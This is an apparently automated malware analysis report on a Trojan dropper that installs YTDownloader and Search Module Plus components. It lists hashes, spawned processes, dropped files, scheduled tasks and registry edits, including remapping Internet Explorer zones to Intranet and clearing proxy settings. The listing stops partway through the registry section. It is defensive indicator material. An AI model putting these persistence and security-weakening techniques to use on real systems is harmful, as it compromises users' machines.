Trojan.Win32.Swrort.3_fc40ca97e6

by malwarelabrobot on September 11th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bjplia (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: fc40ca97e64d78f07b6a60c1304d65f8
SHA1: b842da96c3699394c3c339b20f39ee4bb3129dc7
SHA256: 0933766f85582b1e3b78f7f2a0b4bd0b3f2e3b1f28305d9960be7a68fc1fd30e
SSDeep: 24576:D0Akk3yZcqauV7mfpIx/0E43Z8MiRRlKh UM0QOJsnO:YAtCZVYyVU3ZQLZTO
Size: 1293174 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller Inc.
Created at: 2014-05-11 23:03:36
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:2964
smu.exe:3720
smu.exe:2764
BROWSE~2.EXE:3272
BrowserHelper.exe:1284
sc.exe:3048
sc.exe:3252
sc.exe:2908
sc.exe:364
wscript.exe:3544
net1.exe:3620
net1.exe:3204
%original file name%.exe:1736
net.exe:3184
net.exe:3552
ins_ytd.exe:2552
DC%original file name%.exe:232
DC%original file name%.exe:1276
nsB.tmp:2636
sma.exe:4012
sma.exe:4024
sma.exe:2100
sma.exe:4028
sma.exe:3160
setup.exe:2860
tcpsvcs.exe:2536
tcpsvcs.exe:2284
find.exe:2092

The Trojan injects its code into the following process(es):

YTDownloader.exe:2056

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process smu.exe:2964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\vup.tmp (94 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (411 bytes)

The process smu.exe:2764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (968 bytes)
%Documents and Settings%\All Users\Application Data\SearchModulePlus\smhe.js (407 bytes)

The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (35967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (380759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\D1989.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5E9581DB5A683B1D (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\NK.lky (0 bytes)

The process ins_ytd.exe:2552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (1824812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (164931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss5.tmp (176533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\NK.lky (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\D1958.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss6.tmp\setup.exe (0 bytes)

The process DC%original file name%.exe:232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\Inst_Rep.job (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\bxsdk32.dll (2386 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Install_9382\ins_ytd.exe (61832 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\Inst_Rep.job (0 bytes)

The process DC%original file name%.exe:1276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KAHI9BF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ABGH4T4P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GZQNMLYL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe (7726 bytes)
%WinDir%\Tasks\Inst_Rep.job (728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2N3SX0SU\desktop.ini (67 bytes)

The process setup.exe:2860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\YTDownloader.job (942 bytes)
%Program Files%\YTDownloader\rtmpdump.exe (19592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (4 bytes)
%Program Files%\YTDownloader\YTDownloader.exe (64932 bytes)
%Program Files%\YTDownloader\DownloadAPI.dll (70495 bytes)
%Program Files%\YTDownloader\Unelevate.exe (3312 bytes)
%Program Files%\YTDownloader\BrowserHelper.exe (16424 bytes)
%Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
%Program Files%\YTDownloader\BrowserHelperSrv.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoD.tmp (275210 bytes)
%Program Files%\YTDownloader\Updater.exe (25824 bytes)
%Program Files%\YTDownloader\download_ani.gif (9 bytes)
%Program Files%\YTDownloader\DownloadHelper.exe (13584 bytes)
%Program Files%\YTDownloader\AniGIF.ocx (6360 bytes)
%Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\ssleay32.dll (7192 bytes)
%Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
%Program Files%\YTDownloader\sbmntr.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (11 bytes)
%Program Files%\YTDownloader\libeay32.dll (33455 bytes)
%Program Files%\YTDownloader\YTDUninstall.exe (20624 bytes)
%Program Files%\YTDownloader\Download_completed.ico (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (4 bytes)
%Program Files%\YTDownloader\convert_ani.gif (784 bytes)
%Program Files%\YTDownloader\converter.exe (68799 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (9320 bytes)
%WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseE.tmp\AccDownload.dll (0 bytes)

The process tcpsvcs.exe:2536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (4 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso8.tmp (244481 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (6 bytes)
%WinDir%\Tasks\SMWPUpd.job (2154 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\AccD.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso9.tmp\nsExec.dll (0 bytes)

Registry activity

The process smu.exe:2964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "82 45 47 F5 93 FC 54 F3 F7 56 15 B0 8A 13 5C DB"

"Rlt" = "Type: REG_QWORD, Length: 8"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "B6 80 93 46 AF CE C7 DB C2 AE 60 AB E4 73 47 F2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 96 0B FD 60 57 FC D6 9C 93 E0 F3 66 AF BA 89"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ubl" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process smu.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 FF 3C A9 0B B9 6C E9 E2 AF E1 94 16 3F 13 3D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process smu.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "3C F9 E5 B2 A3 B3 F5 C9 40 A6 C4 04 C0 0E 56 1B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "48 88 03 74 29 F5 E5 8D 0C B9 39 FB A6 93 06 6D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 28 2B 81 19 E8 9A FF 4F 42 C4 ED A5 37 ED 10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BROWSE~2.EXE:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 C0 60 0C 64 F6 C8 71 CD FC DD F2 51 52 75 04"

The process BrowserHelper.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 47 77 72 D4 3F A9 A5 44 F9 4B EE E9 6C 71 26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process sc.exe:3048 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 DD 3C 0E 24 F9 59 5D AF 1A 08 7C 6F 41 A4 09"

The process sc.exe:3252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 FD 54 7F F9 0B DA F7 A7 63 7E 00 1F 9D BB 12"

The process sc.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E2 C4 42 7B D2 D0 46 E2 8C 66 0C D0 5C E1 25"

The process wscript.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 EE BF 36 D8 1D 76 77 C9 5A 41 94 C6 1C 1B 0D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Common Files\Goobzo\GBUpdatePlus]
"smu.exe" = "Search Module Plus Update Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process net1.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 67 BD 23 40 D3 FE CD F7 36 C0 99 39 92 FC 81"

The process net1.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0E BB D1 A3 77 29 72 76 94 FE CC E2 6D 55 EE"

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 2B 67 80 63 54 E4 B4 11 12 53 FB 55 9B B3 C5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\DC%original file name%.exe,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process net.exe:3184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 3C 1D B0 05 5A 73 89 5F 58 3D EA 29 D4 CD AC"

The process net.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 96 74 DA 32 FD 8D 74 F8 0E 96 66 B2 45 FA 50"

The process ins_ytd.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 09 64 61 E0 C9 9F 28 72 02 3E 3A 77 40 BD F7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process DC%original file name%.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

